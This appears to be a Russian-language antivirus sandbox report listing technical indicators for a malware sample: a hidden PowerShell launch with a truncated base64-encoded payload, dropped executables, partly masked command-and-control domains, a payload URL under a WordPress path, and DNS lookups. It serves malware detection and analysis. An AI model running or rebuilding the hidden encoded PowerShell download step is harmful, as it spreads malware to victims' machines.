Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABZAG8AdgBoAGsAbQB4AGEAPQAnAFEAbgBiAGQAYgB3AGcAcwAnADsAJABHAHgAeQBqAGoAYwBuAHoAYgBiAHEAbQAgAD0AIAAnADkAOQAnADsAJABIAGoAYwBsAHAAZwBzAHUAZgBxAG8AZgBqAD0AJwBVAHU...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1596
- %TEMP%\795901.cvr
- %HOMEPATH%\99.exe
- %HOMEPATH%\99.exe
- 'cu###ndroid.com':443
- 'la####adelrio.com':443
- 'vi###-smart.com':80
- http://www.vi###-smart.com/wp-includes/BfbRGW/
- http://www.vi###-smart.com/wp-includes/BfbRGW/1
- 'cu###ndroid.com':443
- 'la####adelrio.com':443
- DNS ASK cu###ndroid.com
- DNS ASK ag###rshan.com
- DNS ASK so##zay.com
- DNS ASK la####adelrio.com
- DNS ASK vi###-smart.com